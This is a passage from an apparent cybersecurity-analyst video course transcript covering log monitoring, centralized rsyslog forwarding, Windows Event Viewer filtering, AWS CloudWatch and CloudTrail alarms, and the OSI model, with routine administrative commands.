as excessive outbound traffic at a certain time of the day when that normally doesn't happen. Or a CPU that's
overly busy when in the past it hasn't been. Now, that could be legitimate. It could be in response to an increase in demand for an app. Or it simply could be malware that's infected a host and is performing cryptomining for cryptocurrencies.
There are different types of continuous monitoring when you dive into the details, such as URL analysis. So
looking at whether or not we might have incoming messages that constitute email phishing scams. And maybe
even comparing incoming messages and strings to known problems or blacklisted URLs. There's DNS
analysis, where perhaps we could analyze network traffic to look at any DNS queries for specific types of
services. That might indicate, for example, that a piece of software is unable to register with the central
authority, perhaps because a PKI certificate has expired.
Now that might be very difficult to track down, other than analyzing DNS traffic where you'll see traffic trying
to go to a DNS name that implies software registration. Then there's standard network traffic flow analysis
using tools like Wireshark. And then there's trend analysis. Trend analysis is very important; it's a general term, but in the case of IT, what we're looking at doing is taking historical information and trying to identify patterns. And there are a lot of monitoring tools that will do this for you. And by doing this, you can even use those patterns to define a security and performance baseline.
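To make the DNS analysis and network traffic flow analysis mentioned above a little more concrete, here's a small sketch using tcpdump; it assumes tcpdump is installed and that eth0 is the capture interface:

    # Watch live DNS queries and responses on interface eth0
    sudo tcpdump -i eth0 -nn udp port 53

    # Or write a capture file for later analysis in a tool like Wireshark
    sudo tcpdump -i eth0 -nn port 53 -w dns-capture.pcap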
3. Video: Log Types (it_cscysa20_08_enus_03)
After completing this video, you will be able to describe the relevance of common log types.
Objectives
[Video description begins] Topic title: Log Types. The presenter is Dan Lachance. [Video description ends]
Logging and monitoring is one corner of IT management that doesn't quite get the attention it deserves.
It might not be considered as exciting as deploying new resources like virtual machines, but it is so important
for the cybersecurity analyst. One of the reasons why is because it relates to our Incident Response Plan. You
won't know a security incident has occurred, therefore the IRP will not be put into motion if you don't know
that something happened by monitoring or reviewing logs.
It's also important to think about access control for logs. Which entities? Which users have the ability to view
logs? Which software entities have the ability to write to logs? It's also important in an enterprise to have
centralized logging and monitoring. One of the reasons is speed. If we can expedite the review of logs, looking
for anomalies and then doing something about it, then we are in a better security position than if we have to
manually reach out to individual hosts and app servers and cloud services looking for anomalies.
Centralization is key. Periodic testing of various types, including penetration testing, can be very important. So
that we can easily identify any deficiencies that might exist with logging and monitoring. For example, a pen
test team might discover that it's very easy to break into a file server where logs are being stored in an
unencrypted format and then clearing the logs or removing them or tampering with them in some way that
would benefit a malicious user.
There are many different log sources: individual host logs, the syslog daemon in UNIX and Linux, firewall logs, intrusion detection systems or IDSs, intrusion prevention systems or IPSs, web application firewalls, and proxy servers.
[Video description begins] Web application firewall is abbreviated as WAF. [Video description ends]
In some cases, the enterprise might use a Unified Threat Management or UTM solution that uses many of these
functions all in one, such as being a firewall and intrusion detection system and a proxy server. So you might
get a wealth of information by reviewing logs from those types of appliances.
[Video description begins] Logging Options. [Video description ends]
There are many different types of logging options that can be tweaked to suit your specific needs. Verbose
logging is detailed logging. This is one of those things that you do not want on all the time, even though it
sounds like something you should do. The reason we don't want verbose logging on all the time for network equipment or firewalls or hosts is because it's taxing on the system's hardware resources. It takes a lot of CPU cycles and potentially disk I/O cycles to log every tiny detail.
So normally, verbose logging is reserved for troubleshooting or security incident research. You should always encrypt log files so that, should a device where log files are stored be compromised, the attacker still wouldn't be able to get into the logs to tamper with them or see what's going on. We should also enable log file integrity so we can detect if anything has been tampered with within a log file. Log files should be backed up to alternate locations, and even the backups themselves should be encrypted. We should have log alerts. Log alerts could be related to someone trying to open a log at an irregular time of the day. Another take on log alerts is
determining what gets written to logs in the first place. You don't want to have alert fatigue, where everything
is written to a log even though it's not relevant. Over time, you'll be able to weed out false positives. In other
words, events that look like they might be malicious but really aren't. So you can tweak configurations and log
filtering to reduce those amounts of alerts. That way, security personnel can focus on alerts that actually have
meaning.
Centralized logging means that we might have hosts, in this example web application servers on the left in a demilitarized zone, or DMZ. The DMZ is reachable from the public Internet. We might configure them to forward their logs to a centralized logging and monitoring host on a different private network. Now, that centralized logging and monitoring host would be configured with alerts; you would configure alert thresholds. So for instance, if it looks like there are excessive requests for a back-end database, that might trigger an alarm. And finally, we would make sure that all of that centralized logging is filtered properly, and then backed up elsewhere and stored in an encrypted form.
[Video description begins] Encrypted backup is done on a protected network. [Video description ends]
Now, you must assume that the servers in the DMZ will at some point be compromised if they're publicly visible. But because they don't retain the only copy of log data, we're in a good situation when it comes to logging and monitoring, because that log data has been copied elsewhere.
Finally, there's log analysis, where we can tweak our IDS and IPS rules based on past events that have been logged. We might even use a centralized log analysis system to correlate events together and perhaps generate alerts. We might do that in the form of a security information and event management, or SIEM, system. We might use collections of tools like Elasticsearch, Logstash, and Kibana, otherwise called ELK. Now, the Elasticsearch part of that is a search and analytics engine. Logstash is a data collection and processing pipeline. And Kibana is a tool that lets you visualize the data that Logstash feeds into Elasticsearch.
[Video description begins] Topic title: Cloud Logging and Auditing. The presenter is Dan Lachance. [Video
description ends]
Organizations that rely on cloud computing need to be well versed in the solutions made available by the cloud
provider for monitoring logs and also for audit events.
[Video description begins] A web page called "AWS Management Console" opens. The page is divided into
three sections labeled "AWS services", "Access resources on the go", and "Explore AWS". The AWS services
section contains a search bar labeled “Find Services”. [Video description ends]
So here in Amazon Web Services, the first thing I'm going to search for here is cloudwatch. CloudWatch, as it
says here, is used to Monitor Resources and Applications. So we can see log events and we can even build
CloudWatch alarms, so we get notified when certain things occur.
[Video description begins] From the search results, he clicks an option called "CloudWatch" and a web page
called "CloudWatch Management Console" opens. It is divided into three parts. The first part is a toolbar. The
second part is a navigation pane. The third part is a content pane. A page called "CloudWatch: Overview" is
open in the content pane. It includes sections called "Alarms by AWS service" and "Recent alarms". The
Recent alarms section includes options called "RebootAppServer" and "Alarm1". [Video description ends]
For example, we can see some Recent alarms here about rebooting a server, or a volume queue being busy.
[Video description begins] He points to the RebootAppServer and Alarm1 options. [Video description ends]
That means disk I/O being busy for a specific virtual machine. And depending on the configuration, we'll also
be able to go in and view different types of logs that are available, depending on the cloud services that have
been deployed.
[Video description begins] He clicks an option called "Log groups" in the navigation pane and the
corresponding page opens in the content pane. [Video description ends]
For example, RDS stands for Relational Database Services. So I can view some of the metrics related to that
by going into the log stream and reading the specific details.
[Video description begins] He clicks a log group called "RDSOSMetrics" and the corresponding page opens.
A list of log streams is displayed. [Video description ends]
[Video description begins] He clicks a log stream and its corresponding page opens. [Video description ends]
[Video description begins] He clicks an option called "Metrics" in the navigation pane and the corresponding
page opens in the content pane. A tab called “All metrics” is open. [Video description ends]
For example, here in Amazon Web Services, I could go to EC2, which is for virtual machine instances
deployed in the cloud.
[Video description begins] He clicks an option called "EC2" and the corresponding page opens. [Video
description ends]
[Video description begins] He clicks an option called "Per-Instance Metrics" and the corresponding page
opens. [Video description ends]
And as I go further down, I can see this is for a host called Linux1. Maybe I'm interested in outbound network
traffic, so NetworkOut.
[Video description begins] He selects a checkbox adjacent to a row with a row entry labeled
“NetworkOut”. [Video description ends]
When I turn on the checkmark, it will graph any known activity for that metric. We can see here that nothing appears.
So therefore, we don't have any activity for network traffic out in the related time frame that's been graphed.
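The same metrics and alarms can also be worked with from the AWS CLI. This is only a sketch; the instance ID, time range, and SNS topic ARN below are placeholders:

    # Pull recent NetworkOut datapoints for one EC2 instance
    aws cloudwatch get-metric-statistics \
      --namespace AWS/EC2 --metric-name NetworkOut \
      --dimensions Name=InstanceId,Value=i-0123456789abcdef0 \
      --start-time 2021-01-01T00:00:00Z --end-time 2021-01-01T01:00:00Z \
      --period 300 --statistics Average

    # Create an alarm that fires when average CPU utilization stays above 80%
    aws cloudwatch put-metric-alarm \
      --alarm-name HighCPU \
      --namespace AWS/EC2 --metric-name CPUUtilization \
      --dimensions Name=InstanceId,Value=i-0123456789abcdef0 \
      --statistic Average --period 300 --evaluation-periods 2 \
      --threshold 80 --comparison-operator GreaterThanThreshold \
      --alarm-actions arn:aws:sns:us-east-1:123456789012:NotifyMe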
[Video description begins] He opens the AWS Management Console web page. [Video description ends]
Let me go back to the main AWS page, and I'm going to search for cloudtrail, because on the auditing side, you
can track activity in the AWS cloud environment.
[Video description begins] From the search results, he selects an option called "CloudTrail". A web page
called “CloudTrail Management Console" opens. A table called “Recent events” is displayed in the content
pane. [Video description ends]
So we can see some recent events here. The User name that was responsible for the event, and the event itself,
such as deleting a subnet or deleting a database instance. Now we can also expand any of those specific items
to get more detail such as the region where that occurred, and the Source IP address.
[Video description begins] He expands an event in the table. [Video description ends]
That would be the IP address that was used, in this case by the root user, to delete a subnet. So we have a lot of
details available here that are automatically tracked. So it's important then to be aware of how your cloud
solution allows you to view logged information and audit events.
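Those same audit events can be pulled from the command line as well. A minimal sketch, assuming the AWS CLI is configured:

    # List recent CloudTrail events attributed to the root user
    aws cloudtrail lookup-events \
      --lookup-attributes AttributeKey=Username,AttributeValue=root \
      --max-results 10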
In this video, learn how to send Linux log events to a centralized logging server.
Objectives
[Video description begins] Topic title: Centralized Linux Logging. The presenter is Dan Lachance. [Video
description ends]
Detecting indicators of compromise and then responding in a timely fashion is made easier when you have
centralized logging. And in Linux and UNIX, we can do that easily with remote log forwarding. Let's start here on my Linux host, which I'm going to call the logging host.
[Video description begins] He opens a command prompt window. The following prompt is displayed: [ec2-
user@ip-172-31-88-210 ~]$. [Video description ends]
This is going to be the central server in our example that will receive log messages from other Linux hosts. So
I need to make some configuration changes. I'll start using the sudo command because some of these
commands require elevated privileges. I'm going to use the nano text editor to open up /etc/rsyslog.conf.
[Video description begins] He executes the following command: sudo nano /etc/rsyslog.conf. The contents of
the file are displayed in GNU nano 2.9.8. [Video description ends]
What I want to do in here is make sure I uncomment the lines for UDP and TCP reception of log information
from other hosts.
[Video description begins] He removes # before the following text, $ModLoad imudp, $UDPServerRun 514,
$ModLoad imtcp, and $InputTCPServerRun 514. [Video description ends]
Now you don't have to do both. You can do one or the other. But notice that the default port number here is
514. Okay, so having done that I'll press Ctrl+X and I'm going to type in the letter y for yes, I'll press enter to
write to the file and it's done. At that point, we are ready to receive remote syslog information on TCP and UDP port 514. So, on this same central host, I'll run sudo netstat to show the status of network connections and port numbers and so on. And I'm going to pass in a bunch of command line parameters here because, specifically, I want to look for a port number that is currently being listened on. And I'm going to pipe that to grep and I'm going to look for rsyslog. And we don't get anything returned because
we've made the configuration change but we've not restarted the daemon.
[Video description begins] He executes the following command: sudo netstat -tnlpu | grep rsyslog. No output
is displayed and the prompt does not change. [Video description ends]
[Video description begins] He executes the following command: sudo service rsyslog restart. The output
reads: Redirecting to /bin/systemctl restart rsyslog.service. The prompt does not change. [Video description
ends]
And now at this point, if I just use the up arrow key and let's go back up to our netstat command. We can now
see that this server now has some listening ports, for 514.
[Video description begins] He executes the following command: sudo netstat -tnlpu | grep rsyslog. The output
displays details of the tcp, tcp6, udp, and udp6 ports. The prompt does not change. [Video description ends]
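To recap the receiving side, the relevant pieces are the four uncommented lines in /etc/rsyslog.conf plus a service restart and a quick verification. This uses the legacy $ModLoad directive syntax shown in this demo; newer rsyslog releases also offer a module()/input() configuration style:

    # Uncomment these four lines in /etc/rsyslog.conf on the central logging host:
    #   $ModLoad imudp
    #   $UDPServerRun 514
    #   $ModLoad imtcp
    #   $InputTCPServerRun 514

    # Then restart the daemon and confirm it is listening on port 514
    sudo service rsyslog restart
    sudo netstat -tnlpu | grep rsyslog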
Okay, so this part is done, we're going to switch over to a different Linux host now and configure it to forward
log messages to this one that we've just enabled logging on. Now, what we should do before we leave this
server is get its IP address. So I'm going to type ifconfig so we can do that, because we're going to need to
specify where we want to send log messages to.
[Video description begins] He executes the following command: ifconfig. The output displays the current
network configuration information. The prompt does not change. [Video description ends]
And I can see the IP here is 172.31.88.210. So we want to make sure that there are no firewalls blocking
connectivity over port 514. Otherwise this won't work. So that's good. Okay, let's go back to our other server
now.
[Video description begins] He executes the following command: ^C. No output is displayed and the prompt
does not change. He opens another command prompt window. The following prompt is displayed: [ec2-
user@ip-172-31-80-186 ~]$. [Video description ends]
So back on my first Linux host where I'm going to forward log messages to the centralized host I'm going to
run sudo nano against /etc/rsyslog.conf just like we did on our centralized logging host.
[Video description begins] He executes the following command: sudo nano /etc/rsyslog.conf. The contents of
the file are displayed in GNU nano 2.9.8. [Video description ends]
But what's different here is that I don't need to enable reception on port 514. This is not the centralized logging host. I'm just going to go to the very bottom and I'm going to tell it that I want to send all types of messages. Now, the first part of the entry identifies a specific facility, or subsystem, because if I go up here, notice we can specify, for example, mail.*, which would be all types of messages related to the mail subsystem, or all messages related to cron.
[Video description begins] He points to the following code: cron.*. [Video description ends]
If I want to send everything, then I could put *.*, meaning all facilities, as they call them, so all sources and all types of messages. And I'm going to put in an at symbol, and I'm going to specify the IP address of our centralized logging host. We saw that on the previous Linux host when we ran ifconfig. The IP is 172.31.88.210. That's all we need to do on this host, assuming that's what we want to enable; I want all messages going there. So I'm going to press Ctrl+X, type in the letter y, and press Enter. And of course, just like on our centralized logging host, to put that into motion we need to restart the rsyslog daemon or service. So I'll use sudo service rsyslog and tell it to restart, and that's it.
[Video description begins] He executes the following command: sudo service rsyslog restart. The output
reads: Redirecting to /bin/systemctl restart rsyslog.service. The prompt does not change. [Video description
ends]
Okay, so the next thing we'll do on my initial source Linux server, the one that is generating log messages, is force a log message using the logger command. And it's going to be "Hello world from Linux"; I'll put that message in quotes, and I'm going to press Enter.
[Video description begins] He executes the following command: logger "Hello world from Linux". No output
is displayed and the prompt does not change. [Video description ends]
So I am manually sending a specific log entry. And I can view that on this host itself using the tail command,
which shows me the last few lines in the text file.
[Video description begins] He executes the following command: sudo tail /var/log/messages. The output
displays the last part of the file. The prompt does not change. [Video description ends]
So on this host, I've run sudo tail /var/log/messages, the system log file. I can see here I've got my "Hello world from Linux" message, but did that get sent over the network, over port 514, to our centralized logging host? Let's switch over to it and take a peek.
[Video description begins] He opens the first command prompt window. The following prompt is displayed:
[ec2-user@ip-172-31-88-210 ~]$. [Video description ends]
So we're back here on our logging host where we can see it's listening on port 514. I'm going to run the same
command we just did a moment ago, sudo tail /var/log/messages. Now, I don't see the message here, but bear in mind that the tail command only shows me the last 10 lines.
[Video description begins] He executes the following command: sudo tail /var/log/messages. The output
displays the last part of the file. The prompt does not change. [Video description ends]
So there might have been a lot of activity, which is why we're simply not seeing it. So instead, why don't we do this: let's run sudo cat to show the contents of /var/log/messages.
[Video description begins] He executes the following command: clear. The screen gets cleared and the prompt
does not change. [Video description ends]
We'll pipe that to the grep line filter, and why don't we just look for the word Hello? I'll just have to make sure I put in the correct file name here, so it's messages, not message.
[Video description begins] He executes the following command: sudo cat /var/log/messages | grep Hello. The
output reads: ip-172-31-80-186ec2-user: Hello world from Linux. The prompt does not change. [Video
description ends]
And indeed we can see that we have the Hello world from Linux message that was generated on the other
Linux host. And it was sent through centralized logging to this one.
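Pulling the forwarding side together, the whole client configuration boils down to one line plus a restart. Here's a quick recap using the logging host IP from this demo; a single @ forwards over UDP, while @@ would forward over TCP:

    # Append a forwarding rule to /etc/rsyslog.conf and restart the service
    echo '*.* @172.31.88.210:514' | sudo tee -a /etc/rsyslog.conf
    sudo service rsyslog restart

    # Generate a test entry, then confirm it arrived on the central logging host
    logger "Hello world from Linux"
    # ...and on the logging host:
    sudo cat /var/log/messages | grep Hello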
6. Video: Windows Event Log Filtering (it_cscysa20_08_enus_06)
In this video, you will filter Windows logs to show only the relevant log entries.
Objectives
[Video description begins] Topic title: Windows Event Log Filtering. The presenter is Dan Lachance. [Video
description ends]
Windows systems use the event viewer as an interface to the logged data on a Windows system.
[Video description begins] He opens a window called "Event Viewer". It is divided into five parts. The first
part is a menu bar. The second part is a toolbar. The third part is a navigation pane. The fourth part is a
content pane. The fifth part is a pane labeled "Actions". [Video description ends]
And so we can take a look at any items that might have been logged related to a particular piece of hardware or
software in the device. So here on Windows 10, I've gone to the Windows Event Viewer on the local machine.
[Video description begins] He points to an option called "Event Viewer (Local)" in the navigation
pane. [Video description ends]
Although notice, I can right-click on that and choose Connect to Another Computer.
[Video description begins] A dialog box called "Select Computer" opens. [Video description ends]
So a technician then can reach out over the network if it's been configured, if it's allowed and firewall rules
don't prevent it. They can reach out over the network and view event log entries for remote network hosts
running the Windows operating system.
[Video description begins] He clicks a button called "Cancel" and the dialog box closes. [Video description
ends]
Now if I expand Windows Logs, there are a couple of standard items here.
[Video description begins] He expands an option called "Windows Logs" in the navigation pane. It contains
options called "Application", "Security", "Setup", "System", and "Forwarded Events". [Video description
ends]
There's the Application log, and the Security log, which is used for any audit configurations.
[Video description begins] He clicks the Security option and the corresponding details are displayed in the
content pane. [Video description ends]
Here, it's for User Account Management. But we could also choose to audit the success or failure of people
trying to access files in the file system. And the results would show up here in the Windows security log on the
host, where those files might exist. The main system log is simply called System.
[Video description begins] He clicks the System option and the corresponding details are displayed in the
content pane. It includes a table with five columns and several rows. [Video description ends]
And we can see the level, whether it's informational or some kind of critical error, the date and time of the logged entry, the source of it, and the Event ID, which indicates what happened. So if you've got some kind of hard disk failure of a specific type, it will always generate the same Event ID, and you can filter or search on that. We also see the Category. Of course, when you select a log entry, you can see the Details down below. Under General, you have a lot of information like the computer where that occurred, as well as further Details.
[Video description begins] He selects a tab called “Details”. It includes radio buttons called "Friendly View"
and "XML View". The Friendly View radio button is selected. [Video description ends]
So you can view it in XML for example, if you want to take a look at the data that way or copy and export it to
another system.
[Video description begins] He selects the XML View radio button. It displays various code. [Video description
ends]
Now as we go further down this list manually, we can see, for instance, that we have, in this case, a couple of
errors, and they're date and time stamped.
[Video description begins] He selects a row with a row entry called "Error" under a column header called
“Level”. [Video description ends]
Well, if we go back under General, having selected that logged entry, it looks like it's for a wireless network
interface. It says it has determined that the network adapter is not functioning properly. Well, that's not good.
Now, other than manually scrolling through looking for this in the System log, for example, we can also right-
click on the System log and filter it.
[Video description begins] He right-clicks the System option in the navigation pane and selects an option
called "Filter Current Log". A dialog box called "Filter Current Log" opens. [Video description ends]
What I might say is, look, all I want to see is critical and error items. Don't care about anything else.
[Video description begins] He selects checkboxes called "Critical" and "Error" for an option called "Event
level". [Video description ends]
We could specify event ID numbers, certain keywords, user names, computer names. I'm just going to leave it
on Critical and Error and I'll click OK. Now, that is all that I am looking at. If I scroll right down through
to the end, I'm only looking at the types of items that I filtered for.
[Video description begins] He scrolls down the table. [Video description ends]
Sometimes when you're looking for that proverbial needle in a haystack related to a security incident, you're
going to need to filter out the noise. So you can just focus on the issue at hand.
[Video description begins] The Filter Current Log dialog box opens. [Video description ends]
So I'm going to right-click on System and choose Filter Current Log again and basically turn it off so I'm not
filtering any longer.
[Video description begins] He deselects the Critical and Error checkboxes. He clicks the OK button and the
dialog box closes. [Video description ends]
Now other than filtering, you can also right-click and choose Find and look for something specific within the
logs.
[Video description begins] He right-clicks the System option in the navigation pane and selects an option
called "Find". A dialog box called "Find" opens. [Video description ends]
[Video description begins] He clicks a button called "Cancel" and the dialog box closes. [Video description
ends]
Now over time you might find it cumbersome to come in and filter on errors or what not. So what you could
do is build a custom view.
[Video description begins] He points to an option called "Custom Views" in the navigation pane. [Video
description ends]
I'm going to right-click on Custom Views and choose Create Custom View.
[Video description begins] A dialog box called "Create Custom View" opens. [Video description ends]
Basically, I only want to see Critical and Error items in one place. And I don't want to have to keep filtering
the System log.
[Video description begins] He selects checkboxes called "Critical" and "Error" for an option called "Event
level". [Video description ends]
So I want to filter out Critical and Error items for specific logs.
[Video description begins] He clicks a drop-down list box called "Event logs". It includes options called
"Windows Logs" and "Applications and Services Logs". [Video description ends]
Let's say the Windows System log, and under Applications and Services Logs.
[Video description begins] He expands the Windows Logs option and selects a checkbox called
"System". [Video description ends]
Maybe I'll also choose under Microsoft Windows, just scroll down here, CloudStore.
[Video description begins] He expands the Applications and Services Logs option. He further expands an
option called "Microsoft". He then expands an option called "Windows" under the Microsoft option. He then
selects a checkbox called "CloudStore". [Video description ends]
So I can select exactly what it is I want to filter out, in other words the source of those log events. And as
usual, as we saw when we were filtering, I can filter by event ID, user name, keyword, computer, all that stuff.
I'm just going to go ahead and create this.
[Video description begins] He clicks a button called "OK" and the dialog box closes. A dialog box called
"Save Filter to Custom View" opens. [Video description ends]
This custom view is going to be called Nothing But Problems. That's really what it's
going to show me. And I'll click OK.
[Video description begins] An option called "Nothing But Problems" is displayed under the Custom Views
option in the navigation pane. The corresponding details are displayed in the content pane. It includes a
table. [Video description ends]
There it is, Nothing But Problems. It will always be here in the left hand navigation panel under Custom
Views, and all I'm going to see is problems. We asked for critical and error, that's all we're ever going to see
naturally. Make sure you're always looking at the date and timestamps so you're not taking action on
something that occurred one year ago.
Not that that's not still important, but ideally you will have already dealt with that issue. Now I can also right-
click on that item and I have the option of filtering the custom view.
[Video description begins] He right-clicks the Nothing But Problems option in the navigation pane and selects
an option called "Filter Current Custom View". A dialog box called "Filter Current Custom View"
opens. [Video description ends]
So I can even filter it further for specific keywords, or computer names or user names or event IDs. All of this
stuff is entirely possible. It's just really about filtering out the noise and getting to what matters,
determining if an incident occurred, and then dealing with the incident response for that item.
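As a reference point, the same Critical and Error filtering shown here in the graphical Event Viewer can be approximated from an administrative command prompt using the built-in wevtutil utility; this is only a sketch, and the event count is just an example value:

wevtutil qe System /q:"*[System[(Level=1 or Level=2)]]" /rd:true /c:20 /f:text

Here qe queries events from the System log, the /q XPath filter keeps only Level 1 (Critical) and Level 2 (Error) entries, /rd:true returns the newest events first, /c:20 limits the output to 20 events, and /f:text formats them as readable text.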
[Video description begins] Topic title: Cloud Alarms. The presenter is Dan Lachance. [Video description
ends]
While it's important to connect to and monitor hosts on the network to mitigate security threats, it's usually a
better configuration when you automate this. And that means configuring thresholds that, when violated, notify
administrators, such as when there's a spike in activity or some kind of abnormal activity. So here in the
Amazon Web Services cloud, we're going to do that for a virtual machine, an EC2 instance, when its CPU gets
beyond a certain point of busyness.
[Video description begins] A web page called "AWS Management Console" opens. [Video description ends]
So to get started here in the AWS Management Console, I'm going to click on EC2 to open up the EC2
Management Console, we'll click Instances on the left.
[Video description begins] The corresponding page opens. [Video description ends]
We've got a number of Windows and Linux instances. I'm interested in Linux1. When I select that EC2
instance or that cloud based virtual machine, down below I can open up the Monitoring tab. And from here, it
says No alarms configured. I can create an alarm. So I'm going to click Create alarm.
[Video description begins] A dialog box called "Create Alarm" opens. [Video description ends]
Now I can send a notification or I can take a particular action, such as to reboot the instance if it's not
responding or anything along those lines. But I can also send a notification to what's called a topic. You can
select an existing topic from the list. I've already got one called Topic1, or you can click the link to create
one.
[Video description begins] He clicks a link called "create topic" and a text box called “With these recipients”
appears. [Video description ends]
Now a topic can be used to send email messages to a recipient group. So we have a number of options to do
that. So I'm going to go back and cancel and leave that on an existing topic called Topic1 that contains a group
email address. I want to send a notification, but under what circumstances?
[Video description begins] He clicks a drop-down list box called "Whenever" and a list opens, which includes
options called “Average”, “Minimum”, and “Maximum”. The Average option is selected. [Video description
ends]
Down below, I can select for example, the Average CPU Utilization although there are many other metrics I
might be interested in looking at.
[Video description begins] Adjacent to the Whenever drop-down list box, he clicks a drop-down list box called
“of” and a list opens, which includes options called “CPU Utilization”, “Network In”, and “Disk Writes”.
The CPU Utilization option is selected. He then enters 85 in a text box called "Percent". [Video description
ends]
And if it's greater than, let's say 85% for at least one consecutive period of 5 Minutes, then I want this to be
triggered. Down below, I'm going to click Create Alarm.
[Video description begins] A message box called "Alarm created successfully" opens. [Video description ends]
[Video description begins] He clicks a button called "Close" and the message box closes. [Video description
ends]
Now currently here under the Monitoring tab for that instance, it says 1 of 1 in INSUFFICIENT DATA.
[Video description begins] He points to the Linux1 instance. [Video description ends]
And if I click on that, we don't have any data yet because we've just created the alarm. It doesn't know how
busy the CPU is. But we do see that we have that configuration listed here.
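As a rough command line equivalent of the alarm just configured in the console, the AWS CLI can create the same kind of CloudWatch alarm; this is only a sketch, and the instance ID, region, account number, and topic name are placeholders:

aws cloudwatch put-metric-alarm \
  --alarm-name Linux1-HighCPU \
  --namespace AWS/EC2 \
  --metric-name CPUUtilization \
  --statistic Average \
  --period 300 \
  --evaluation-periods 1 \
  --threshold 85 \
  --comparison-operator GreaterThanThreshold \
  --dimensions Name=InstanceId,Value=i-0123456789abcdef0 \
  --alarm-actions arn:aws:sns:us-east-1:111122223333:Topic1

The alarm watches average CPU utilization over one consecutive 5-minute period and publishes to the SNS topic when it exceeds 85 percent.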
Upon completion of this video, you will be able to list how the 7 layers of the OSI model relate to
communications hardware and software.
Objectives
list how the 7 layers of the OSI model relate to communications hardware and software
[Video description begins] Topic title: OSI Model. The presenter is Dan Lachance. [Video description ends]
If you've been working in IT for some time, you might already be familiar with the open systems interconnect
or OSI model.
[Video description begins] Open Systems Interconnect (OSI) Model. [Video description ends]
If you're not, don't worry, we're going to talk about it. The OSI model is a seven-layer conceptual model
that's used to describe the inner workings of network software and hardware on a sending device and on a
receiving device across a network.
The first layer of the OSI model is the physical layer. Second one is data link. The physical layer deals with
physical components, like cables, whether we're using twisted pair copper wires or fiber optic. Connectors,
whether we're using RJ-45 network connectors or Straight Tip, ST, for fiber optic. Electrical specifications
such as transmission frequencies. That's all physical layer stuff. The data link layer deals with media access
methods, how to access network transmission media. Whether it's Ethernet, token ring or accessing wireless
transmission frequencies. The MAC address, the Media Access Control address is a 48-bit hexadecimal
address unique to a network interface. Whenever it's an Ethernet card or a token ring card or a WiFi card. So
MAC addresses apply to layer two, the data link layer. And network infrastructure devices like bridges and
switches also apply to layer two.
Now, be careful, because there is also such a thing as a layer three switch. If the switch is only interested in and
deals with MAC addresses, then it's called a layer two switch. We'll focus on layer three in a moment. Layer three is
the network layer, and layer four is the transport layer. Layer three, the network layer of the OSI model, deals
with software network addresses like IP addresses for IPv4 or IPv6. The network layer also deals with the
routing of packets across networks to get to a target through the most efficient path. So therefore routers would
apply to layer three. And whether you're configuring static routes or using dynamic route learning, all of that is
layer three stuff.
Now if you've got a layer three switch, it means that beyond what it does at layer two, remembering which MAC
addresses are plugged into specific ports, it can also work with layer three addresses, like IP
addresses. Layer four, the transport layer, uses transport mechanisms to ensure end-to-end delivery between a
sending and a receiving host on a network. So that means protocols like Transmission Control Protocol, TCP,
and User Datagram Protocol, UDP, apply to layer four. Now UDP is best effort. It just transmits out on the
network and hopefully the recipient got what it needed. Hopefully you've got everything, there's no checking.
TCP is much more careful.
A connection session must be established before transmitting. And then every transmission that's sent must be
acknowledged by the receiver. So TCP has more overhead, but it's also more careful. Addresses that apply at
layer four would not be MAC addresses or IP addresses but port addresses. Such as for an HTTP web server,
TCP port 80. Or if it's secured with a PKI certificate, so HTTPS, you would use TCP port 443. SMTP mail
servers use port 25, that type of thing. Port addresses apply to layer four, the transport layer. Layer five of the
OSI model is the session layer. Layer six is presentation. Layer five, the session layer, deals with network
sessions. So establishing a session, maintaining it, and then tearing it down once the transmission is complete.
Now you might say this sounds like a user login, but it doesn't have to involve user authentication.
You can set up a session for the sole purpose of transmitting something across a network. Without dealing with
usernames, passwords or authentication at that level. There's also the negotiation of session parameters, such as
if we're going to use an encryption algorithm and how strong the key will be and so on. Layer six, the
presentation layer of the OSI model deals with how data that gets transmitted over the network is presented.
Hence, presentation. But, what do you mean, presented? Well, whether it's encrypted or not, whether it's
compressed or not, the specific character set that's being used.
[Video description begins] The presentation of transmission of data over the network also includes
decryption. [Video description ends]
So for example, ASCII versus Unicode characters, all of that type of stuff.
Finally, we get to the top of the OSI model, layer seven, the application layer. This deals with application-
specific data. Now, it can involve direct user action, but it doesn't have to. It doesn't necessarily mean the user's
clicking on things and typing things in. But it deals with any type of app, including APIs, so programmatically
calling upon functions. And other higher level protocols like DNS for name resolution. FTP for file transfer.
Trivial FTP for file transfer without authentication.
[Video description begins] Trivial FTP is abbreviated as TFTP. [Video description ends]
[Video description begins] Mapping Packet Headers to the OSI Model. [Video description ends]
Now, the last thing we'll look at here is how you might map packet headers to the OSI model. For instance, if
you're analyzing network traffic by capturing it off the network using tools such as tcpdump in UNIX and
Linux or Wireshark. So the Ethernet header applies to OSI Layer 2, the Data Link Layer. The Ethernet
header is a part of every packet in an Ethernet network. It contains the source and destination MAC addresses
that are used to get transmissions or frames sent around. Now take note that on a local area network, if you are
transmitting to another device on the LAN, your MAC address is the source and that host's
MAC address is the destination. But if you're communicating, let's say, with something on the Internet, the
destination MAC address that your machine is concerned with is not the MAC address of the other host
somewhere else on the Internet. It's that of your local default gateway, your router. The IP Header in a packet
capture would apply to OSI Layer 3, the Network Layer. And as we know, Layer 3 deals with IP addresses,
source and destination.
So if I have a Layer 3 firewall, guess what? It has the ability to look at anything in layers 1, 2 and 3, like IP
address information, MAC addresses, and so on. Layer 4, the TCP header in the case of using software that
uses TCP, because Layer 4 could also be UDP. But in this case, we're saying it's TCP. So that applies to the
transport layer. And that would include things like source and destination port addresses. So for a user connecting
to a standard web server, port 80 would be in the TCP header as the destination port, where the
source port is a higher-numbered port on the client that the web server uses to communicate back with that client station. Finally,
the Payload of the data, the detail of the packet would fall somewhere within OSI Layers 5 through to 7.
Depending on the exact type of transmission. So Layer 5 is the Session Layer, layer 6 is Presentation and you'll
recall that Layer 7 is the Application Layer. Now the data shows up in the payload of the transmission. And
how things have been configured will determine whether or not that payload is encrypted or can
be viewed in plain text.
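To see this layering on live traffic, here's a small tcpdump sketch; the interface name eth0 is just an assumption for your system:

sudo tcpdump -i eth0 -e -nn -c 5 tcp port 80

The -e option prints the Ethernet header with source and destination MAC addresses (Layer 2), -nn leaves IP addresses (Layer 3) and port numbers (Layer 4) unresolved so you see the raw values, and -c 5 stops after five packets that match the TCP port 80 filter.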
describe common items to look out for when analyzing network traffic
[Video description begins] Topic title: Network Traffic Analysis. The presenter is Dan Lachance. [Video
description ends]
One of the responsibilities that is often tasked to a cybersecurity analyst is the analysis of network traffic.
There is a wide array of tools available out there for performing this kind of work. The Multi Router Traffic
Grapher, or MRTG, is one example, and there are plenty of free versions of tools like this. It allows you to monitor
network traffic on a network link, measure the network traffic load on that link, and then also visualize
